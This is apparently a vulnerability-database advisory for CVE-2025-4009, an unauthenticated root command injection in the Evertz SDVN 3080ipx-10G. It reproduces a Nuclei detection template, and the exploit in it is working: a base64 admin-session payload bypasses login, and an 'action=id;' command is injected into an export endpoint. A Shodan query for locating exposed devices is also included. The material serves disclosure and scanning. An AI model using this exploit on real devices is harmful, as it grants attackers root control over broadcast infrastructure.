CVE-2025-4009: Evertz SDVN 3080ipx-10G - Unauthenticated Arbitrary Command Injection

日期: 2025-08-01 | 影响软件: Evertz SDVN 3080ipx-10G | POC: 已公开

漏洞描述

The Evertz SDVN 3080ipx-10G is a High Bandwidth Ethernet Switching Fabric for Video Application. This device exposes a web management interface on port 80. This web management interface can be used by administrators to control product features, setup network switching, and register license among other features. The application has been developed in PHP with the webEASY SDK, also named ‘ewb’ by Evertz.This web interface has two endpoints that are vulnerable to arbitrary command injection and the authentication mechanism has a flaw leading to authentication bypass.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.This level of access could lead to serious business impact such as the interruption of media streaming, modification of media being streamed, alteration of closed captions being generated, among others.

PoC代码[已公开]

id: CVE-2025-4009

info:
  name: Evertz SDVN 3080ipx-10G - Unauthenticated Arbitrary Command Injection
  author: ONEKEY,iamnoooob,pdresearch
  severity: critical
  description: |
    The Evertz SDVN 3080ipx-10G is a High Bandwidth Ethernet Switching Fabric for Video Application. This device exposes a web management interface on port 80. This web management interface can be used by administrators to control product features, setup network switching, and register license among other features. The application has been developed in PHP with the webEASY SDK, also named ‘ewb’ by Evertz.This web interface has two endpoints that are vulnerable to arbitrary command injection and the authentication mechanism has a flaw leading to authentication bypass.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.This level of access could lead to serious business impact such as the interruption of media streaming, modification of media being streamed, alteration of closed captions being generated, among others.
  reference:
    - https://www.onekey.com/resource/security-advisory-remote-code-execution-on-evertz-svdn-cve-2025-4009
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/V:C
    cvss-score: 9.3
    epss-score: 0.0777
    epss-percentile: 0.91626
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"evertz.min.css"
  tags: cve,cve2025,evertz,rce,unauth,vkev

variables:
  payload: '{"user": {"name": "admin", "login": "admin"},"role":{"name":"administrator", "restrictions": [],"deleteable": false}}'

http:
  - raw:
      - |
        GET /login.php?authorized={{base64(payload)}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "PHPSESSID","webeasy-loggedin","index.php")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /v.1.5/php/features/feature-transfer-export.php?action=id;&filename=&varid=&slot= HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ba408dc02c912a68094e5a30d5e41346a70f5a5c9dde0c49034a531543c86374022060173cb95087c6ff3c3cc1fabdcd78831d07e12bbf04d1bbddcf6f9d2c0add9c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐